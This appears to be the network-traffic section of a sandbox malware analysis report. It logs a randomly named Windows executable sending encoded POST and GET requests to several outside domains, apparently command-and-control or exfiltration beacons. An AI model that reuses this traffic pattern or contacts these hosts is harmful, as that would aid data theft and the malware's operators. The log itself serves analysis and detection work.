Jan 10, 2025 20:19:22.628391981 CET	870	OUT	POST /vjnn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.gk88top.top Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 227 Cache-Control: no-cache Origin: http://www.gk88top.top Referer: http://www.gk88top.top/vjnn/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 76 52 2f 35 70 39 4e 45 74 6f 77 76 64 57 6c 49 6f 70 70 62 37 5a 78 79 30 76 63 57 56 39 77 63 53 2f 41 70 32 32 44 4d 38 73 32 46 68 37 67 68 52 54 72 4d 50 4b 46 68 55 56 7a 62 62 68 41 5a 69 72 77 75 47 62 30 72 4a 6e 69 65 4e 54 43 4b 42 4f 52 6d 75 32 55 62 42 33 54 50 4e 33 4c 72 30 58 37 78 71 44 75 33 6c 42 6e 36 67 6b 4c 64 53 79 75 35 2b 49 30 4c 39 7a 59 68 42 4e 56 5a 37 33 2f 6f 6b 46 59 41 6d 34 32 56 44 79 33 70 48 6a 31 51 74 33 4f 4a 68 35 2f 33 77 52 5a 66 31 73 46 37 2b 68 62 30 6d 38 44 52 4f 55 6b 37 57 47 Data Ascii: _6yxCX=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxvR/5p9NEtowvdWlIoppb7Zxy0vcWV9wcS/Ap22DM8s2Fh7ghRTrMPKFhUVzbbhAZirwuGb0rJnieNTCKBORmu2UbB3TPN3Lr0X7xqDu3lBn6gkLdSyu5+I0L9zYhBNVZ73/okFYAm42VDy3pHj1Qt3OJh5/3wRZf1sF7+hb0m8DROUk7WG
Jan 10, 2025 20:19:23.685231924 CET	972	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:19:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdTC9gSWjw%2B8u6cZFHB4lbvt%2F03RPx62I3jSvnH9pxqxbZSllz1BmhLYnGnCzwSIvXVduHCA9FISEIlgKX3%2BRLWEd%2F2PoWt1chXNkHb2zzkV1HTVpoVVQ0fX6W75IXRYlAw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff04b0e9dade97-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=870&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49977	172.67.137.47	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:25.333007097 CET	1887	OUT	POST /vjnn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.gk88top.top Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1243 Cache-Control: no-cache Origin: http://www.gk88top.top Referer: http://www.gk88top.top/vjnn/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 6e 52 2f 71 52 39 4f 69 6c 6f 69 2f 64 57 35 59 6f 53 70 62 37 59 78 78 45 72 63 57 5a 48 77 66 71 2f 41 4c 4f 32 42 35 63 73 38 46 68 37 6f 42 52 51 6d 73 50 6c 46 68 45 4a 7a 61 33 68 41 5a 69 72 77 75 71 62 39 5a 78 6e 78 4f 4e 51 56 36 42 61 56 6d 75 53 55 62 5a 6e 54 50 5a 4e 4c 61 55 58 38 52 61 44 72 45 42 42 6c 61 68 43 4f 64 54 79 75 35 7a 57 30 4c 67 43 59 69 64 7a 56 65 66 33 2b 4e 30 47 41 77 2b 50 6c 6c 48 73 37 37 37 67 33 48 42 79 41 76 31 64 37 67 4d 45 47 39 30 62 54 4d 4f 77 58 78 50 47 51 41 79 54 31 75 4b 4c 74 32 43 50 7a 48 4a 59 36 62 45 45 61 2f 49 65 43 76 78 69 61 31 59 55 46 45 4a 70 45 64 6c 4c 59 4f 6e 36 47 36 30 59 4c 76 68 54 76 33 56 61 75 67 62 55 46 6e 6d 50 67 70 6d 66 56 55 47 2b 41 61 41 74 79 58 7a 79 54 4c 34 63 73 6a 54 44 31 46 50 4c 32 32 6c 4b 77 55 37 43 6c 48 73 58 43 45 58 32 42 31 68 47 4a 35 64 77 67 46 57 [TRUNCATED] Data Ascii: _6yxCX=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxnR/qR9Oiloi/dW5YoSpb7YxxErcWZHwfq/ALO2B5cs8Fh7oBRQmsPlFhEJza3hAZirwuqb9ZxnxONQV6BaVmuSUbZnTPZNLaUX8RaDrEBBlahCOdTyu5zW0LgCYidzVef3+N0GAw+PllHs777g3HByAv1d7gMEG90bTMOwXxPGQAyT1uKLt2CPzHJY6bEEa/IeCvxia1YUFEJpEdlLYOn6G60YLvhTv3VaugbUFnmPgpmfVUG+AaAtyXzyTL4csjTD1FPL22lKwU7ClHsXCEX2B1hGJ5dwgFWjFMnt2iPE9YxRvvDQZkhUb+B/V/4eLA7IhrgFQ5bLCgTm+8TC4z7Mn7XVpCfnjsJ9xIMJB+a1o4C6aUnp9drt/XT3ZrN0OWY4AuUSIjbWL76AUkYfSXmAH2BA36nKDaS047jPGmuW+TZI61YFb7ODS1n/bpOiEK0TvL9p5XqyENkI701j0ZMzdtu0B6eLRj8yWxlZxi5Hd+l5xGF4F6fpfIXSzKnsnNBVUQxoaBQuA/e7oA7At4EUFNi07Vof0Qguzyb67je2SuII+PZV38EEHlGB6cxisvUIZjH241O/WSt6LheC84hDbTivD7Pm9L7fXUrXX1oaRQd4ft08Xeo5NfoUD3MWXnRqETeB6Xct5izmrjlXJVTPTOocZ5SY/zcvVCqR7usavG2cxwggJjhVGUlEWS947SV4Htr+cMTZHZ/Ci6LrWbkvSaqW++kQqE6YoizZmR1S97sYBdoXoM5CAsFbyw9m1wbTcv/LXM0yJ+OaMyRkInSXH+lz7CXlXdtD9bnNLXmCDgT8/M+kqlb4OJEl+XJUlMmKjRLehOfXOInkZV9QTMq5tlqkVm4QWVGitBOJjSgTT4oAxJmJI/AmMqNMsHw37wduT/dh/V71mCjD1tBxRhUk2KUzFYYKMq5pBeXyj9kW0UFzVO0oshFFpwBEcJyG82fBs [TRUNCATED]
Jan 10, 2025 20:19:26.523648024 CET	985	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:19:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNw%2FdI8k0%2FJOTCIVIfPVXH%2BH8hoR86P%2F5hjsnUB3E9Yq1okg9CwPHRFI1PdhXC%2BLpnAtibK0N0yz%2Bbu8zvTIjYAmPfNstS%2B51K4PHf%2BzV9ceB4doXBvM1EMcW5eqjR6RuiE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff04c2b9aa7d14-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=75329&min_rtt=75329&rtt_var=37664&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1887&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49978	172.67.137.47	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:27.872736931 CET	592	OUT	GET /vjnn/?_6yxCX=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1C145Dcw9vjhITsM+OTgM5u/otOh0qpDqOlQHZdtVA7DGw==&vNTT0=e8zLx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.gk88top.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Jan 10, 2025 20:19:28.892595053 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:19:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FrY%2Fbci1g4z2FUKSC72hbJHegoDwAquzDstjtCMWBWPa4ivJsr1tWrFWxD%2F%2FKcw4ji%2B%2Fc0wyBf2A05uF5twurHyYdhq8042WMKxaVted%2B4uYOGMySWGyUIvnM%2BB7cFP%2B0t8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff04d1a94a43ab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=592&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED] Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chro
Jan 10, 2025 20:19:28.892612934 CET	102	IN	Data Raw: 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 Data Ascii: me friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49980	206.238.89.119	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:34.733702898 CET	847	OUT	POST /2mep/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.127358.win Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 207 Cache-Control: no-cache Origin: http://www.127358.win Referer: http://www.127358.win/2mep/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 44 6a 6e 6f 62 4d 75 69 6f 6c 36 49 4c 70 7a 32 4f 4d 66 30 49 4d 53 78 2b 65 6a 6a 74 4c 4e 72 56 35 2b 57 62 6f 51 36 39 41 72 4b 6d 70 63 44 4e 48 36 6e 2f 7a 4c 45 36 66 77 62 4a 70 71 61 75 30 6f 4c 69 54 51 37 50 46 73 7a 34 46 6e 45 4c 2b 43 75 31 2b 44 52 76 74 45 51 54 51 43 38 65 6b 39 55 41 53 73 4b 4d 66 6c 76 66 52 4e 75 4f 31 71 65 4a 66 39 75 61 6f 32 51 75 47 70 30 44 2b 59 71 58 75 72 49 4c 41 45 2b 4b 2b 2b 78 35 74 43 6a 4f 6b 48 57 72 66 5a 54 54 48 6f 34 6d 6d 61 46 65 73 6a 70 58 2b 6a 6a 4e 66 79 67 34 33 6e 78 4d 67 4f 32 6c 59 3d Data Ascii: _6yxCX=duT9QTO+95xe8DjnobMuiol6ILpz2OMf0IMSx+ejjtLNrV5+WboQ69ArKmpcDNH6n/zLE6fwbJpqau0oLiTQ7PFsz4FnEL+Cu1+DRvtEQTQC8ek9UASsKMflvfRNuO1qeJf9uao2QuGp0D+YqXurILAE+K++x5tCjOkHWrfZTTHo4mmaFesjpX+jjNfyg43nxMgO2lY=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49981	206.238.89.119	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:37.284609079 CET	867	OUT	POST /2mep/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.127358.win Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 227 Cache-Control: no-cache Origin: http://www.127358.win Referer: http://www.127358.win/2mep/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 76 4e 73 30 4a 2b 48 76 63 51 33 64 41 72 53 32 70 64 64 39 48 48 6e 2f 2f 31 45 37 6a 77 62 4e 4a 71 61 75 45 6f 4c 52 4c 66 34 2f 46 35 37 59 46 70 62 37 2b 43 75 31 2b 44 52 76 35 2b 51 58 38 43 38 75 55 39 57 68 53 6a 41 73 66 6d 73 66 52 4e 34 4f 31 75 65 4a 66 62 75 62 45 63 51 6f 4b 70 30 42 32 59 71 47 75 6f 43 4c 41 43 6a 36 2f 39 67 34 77 6e 76 76 59 4f 58 4a 71 6c 49 52 4c 49 35 51 58 77 66 38 6b 4c 36 33 53 62 7a 65 58 46 78 49 57 4f 72 76 77 2b 6f 79 4d 33 6c 4e 76 65 6a 65 67 63 70 38 58 77 78 44 39 6b 6d 39 37 44 Data Ascii: _6yxCX=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifvNs0J+HvcQ3dArS2pdd9HHn//1E7jwbNJqauEoLRLf4/F57YFpb7+Cu1+DRv5+QX8C8uU9WhSjAsfmsfRN4O1ueJfbubEcQoKp0B2YqGuoCLACj6/9g4wnvvYOXJqlIRLI5QXwf8kL63SbzeXFxIWOrvw+oyM3lNvejegcp8XwxD9km97D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49982	206.238.89.119	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:39.831163883 CET	1884	OUT	POST /2mep/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.127358.win Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1243 Cache-Control: no-cache Origin: http://www.127358.win Referer: http://www.127358.win/2mep/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 6e 4e 73 47 42 2b 56 34 41 51 32 64 41 72 62 57 70 51 64 39 48 57 6e 2f 6e 78 45 37 75 46 62 4c 46 71 62 4e 4d 6f 44 41 4c 66 6a 50 46 35 33 34 46 6f 45 4c 2b 58 75 31 76 72 52 76 70 2b 51 58 38 43 38 73 4d 39 53 77 53 6a 47 73 66 6c 76 66 51 43 75 4f 31 47 65 4a 47 67 75 62 77 6d 54 59 71 70 78 52 6d 59 6c 55 32 6f 41 72 41 41 69 36 2f 66 67 34 38 30 76 76 45 6f 58 4e 71 62 49 53 72 49 31 6b 53 66 48 70 45 41 6f 78 4b 52 35 38 6e 64 68 75 43 35 31 4f 30 53 73 6b 49 49 71 4f 54 65 6c 61 6b 35 72 66 79 61 6a 47 70 31 73 37 7a 4c 7a 62 44 6e 36 4a 77 78 64 6f 56 45 4f 59 35 55 44 2b 32 51 6f 33 72 68 31 45 31 61 77 77 6f 6d 49 59 65 52 66 44 4b 56 67 35 4b 6b 66 6d 57 47 73 79 74 54 68 45 44 6c 71 51 57 67 42 4b 32 5a 67 76 69 65 35 70 45 35 6a 6f 2f 34 4c 49 74 58 6f 73 46 67 51 74 4b 37 2b 46 6b 44 39 66 2b 34 5a 78 39 58 72 70 68 36 68 56 4b 35 4f 4d 63 [TRUNCATED] Data Ascii: _6yxCX=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifnNsGB+V4AQ2dArbWpQd9HWn/nxE7uFbLFqbNMoDALfjPF534FoEL+Xu1vrRvp+QX8C8sM9SwSjGsflvfQCuO1GeJGgubwmTYqpxRmYlU2oArAAi6/fg480vvEoXNqbISrI1kSfHpEAoxKR58ndhuC51O0SskIIqOTelak5rfyajGp1s7zLzbDn6JwxdoVEOY5UD+2Qo3rh1E1awwomIYeRfDKVg5KkfmWGsytThEDlqQWgBK2Zgvie5pE5jo/4LItXosFgQtK7+FkD9f+4Zx9Xrph6hVK5OMcTzRge4GruFIdyfzCWNwT5onehJTsuSyY/PzN/HGOa1Q44LWq35wy8sYL/lSvJ9MYs0UJnNae//tYbpdmQrZMl4eqAQdsb0umNj0DwtmWtvYBALTe+Rf/d/VUsmM6X5sag1VqzkyECW8V2yHi9MzUqUmMYCYe4r8PgWBDAI/pLV+eMKSx6Tsng5GnipT0Wfn8zlkPrcf1vEuEx1UxRftAADpzkYif5ZvuqVA5CtDygVOIR2Bya8+Tr8yOdVtV9QAHGLK3N1Xsx0h6bwSoDvKZylBZD8xNkOCS6QOoK7Rdk90ccSLcOV+xI1P/cRmYK3YzG8NDOhL0Om9e0/h53AXvs6zWXL1S8LvKbbOKXmT57FwCbMZy5gcueNijyFS6aVJBf0o3tniWg2Et5dNtZ4mjJC2tJss/AC/pscTHEFh7XALID03IPwO3a+/Jlwglln0zDP30HlfPnTwetdytNR6oA4hVc8O5eKbuQLfFsAJJTZq1YZZdnJ3opv6JH3gDKascKTpwqvU4RR6vijRbTBLCASUVasUFI0qcMOeQmW3Mm38MkpklDUi2bI5VKGabmEaYRHZFnXD8Ew76VeMxZanI3LLAnQ3nSZJwespXek3f3QI1H3yqxxPgkjdgJxoAaIFy+dzqdy8BlT8yT+PvCtk8Kjv7bOht9TEKQr [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49983	206.238.89.119	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:42.372986078 CET	591	OUT	GET /2mep/?vNTT0=e8zLx&_6yxCX=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn/wnl45Qbp2dk37eS9E9dWkFwc0rUSawKZLqv+Rq0dg9Eg== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.127358.win Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49984	66.29.149.46	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:08.970350981 CET	865	OUT	POST /cnve/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.infohive.website Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 207 Cache-Control: no-cache Origin: http://www.infohive.website Referer: http://www.infohive.website/cnve/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6b 44 64 5a 65 30 37 36 5a 34 74 2b 51 70 44 6b 59 63 36 44 6a 72 36 32 49 56 4d 38 76 69 48 37 67 5a 51 52 52 57 52 53 54 66 65 4e 4d 52 68 55 61 58 48 6b 61 63 41 64 6f 6e 47 74 4a 76 56 61 36 73 4a 57 63 38 42 51 46 58 77 74 56 31 61 57 31 74 50 57 64 61 6f 39 4a 52 42 76 74 74 46 56 50 53 35 56 72 6e 65 76 6d 39 46 73 55 75 58 2b 78 62 33 76 69 6b 62 62 54 64 69 7a 31 6f 6b 71 4e 6e 76 68 58 76 4f 71 4e 51 55 52 4f 61 65 65 47 42 7a 33 4d 71 4f 63 77 66 51 57 30 45 65 6d 72 65 6b 75 6f 71 6f 6c 54 63 4a 53 56 42 75 74 65 74 30 49 37 79 73 44 36 75 73 3d Data Ascii: _6yxCX=7XryTos10RqWkDdZe076Z4t+QpDkYc6Djr62IVM8viH7gZQRRWRSTfeNMRhUaXHkacAdonGtJvVa6sJWc8BQFXwtV1aW1tPWdao9JRBvttFVPS5Vrnevm9FsUuX+xb3vikbbTdiz1okqNnvhXvOqNQUROaeeGBz3MqOcwfQW0EemrekuoqolTcJSVButet0I7ysD6us=
Jan 10, 2025 20:20:09.629398108 CET	637	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:20:09 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 